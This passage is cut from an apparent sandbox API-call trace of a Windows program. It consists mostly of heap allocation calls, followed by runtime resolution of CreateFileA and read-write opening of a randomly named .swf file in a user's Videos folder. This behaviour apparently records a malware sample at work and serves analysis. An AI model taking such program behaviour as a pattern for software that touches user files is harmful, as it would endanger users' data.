hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0198.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0198.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0198.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0198.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0198.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0198.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0198.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0198.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0198.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0198.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0198.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0198.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0198.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0198.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0198.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0198.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0198.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0198.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0198.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0198.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0198.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0198.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0198.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0198.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0198.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0198.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0198.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0198.429] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0198.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0198.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0198.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0198.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0198.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0198.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0198.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0198.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0198.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0198.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0198.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0198.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0198.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0198.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0198.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0198.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0198.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0198.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0198.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0198.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0198.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0198.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0198.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0198.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0198.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0198.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0198.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0198.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0198.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0198.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0198.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0198.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0198.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0198.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0198.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0198.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0198.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0198.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0198.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0198.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0198.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0198.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0198.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0198.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0198.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0198.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0198.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0198.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0198.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0198.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0198.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0198.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0198.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0198.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0198.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0198.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0198.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0198.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0198.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0198.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0198.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0198.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0198.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0198.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0198.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0198.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0198.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0198.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0198.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0198.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0198.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0198.432] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0198.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0198.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0198.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0198.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd420 [0198.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd420, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0198.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0198.432] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0198.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0198.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0198.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0198.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0198.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0198.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0198.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0198.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd420 [0198.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd420, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0198.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0198.433] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0198.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0198.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0198.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0198.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0198.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0198.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0198.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0198.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0198.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0198.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0198.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0198.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0198.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0198.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.swf", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0198.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3e) returned 0x8db138 [0198.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.swf", cchWideChar=62, lpMultiByteStr=0x8db138, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.swf", lpUsedDefaultChar=0x0) returned 62 [0198.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0198.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0198.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0198.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0198.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0198.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0198.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0198.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0198.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0198.434] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghioo2t\\tv3avy6ign_a.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0198.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0198.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0198.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0198.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0198.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0198.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0198.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0198.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0198.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0198.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0198.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0198.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0198.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0198.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0198.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=62, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0198.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7c) returned 0x9c0b78 [0198.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=62, lpWideCharStr=0x9c0b78, cchWideChar=62 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.swf") returned 62 [0198.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0198.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0198.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0198.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0198.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0198.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0198.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0198.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0198.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0198.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0198.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0198.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0198.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0198.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0198.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0198.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0198.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0198.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0198.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0198.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0198.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0198.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0198.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0198.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0198.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0198.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0198.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0198.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0198.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0198.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0198.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0198.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0198.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0198.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0198.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0198.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0198.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0198.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0198.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0198.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0198.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0198.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0198.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0198.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0198.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0198.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0198.437] FreeLibrary (hLibModule=0x75990000) returned 1 [0198.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0198.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0198.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0198.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0198.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0198.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0198.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 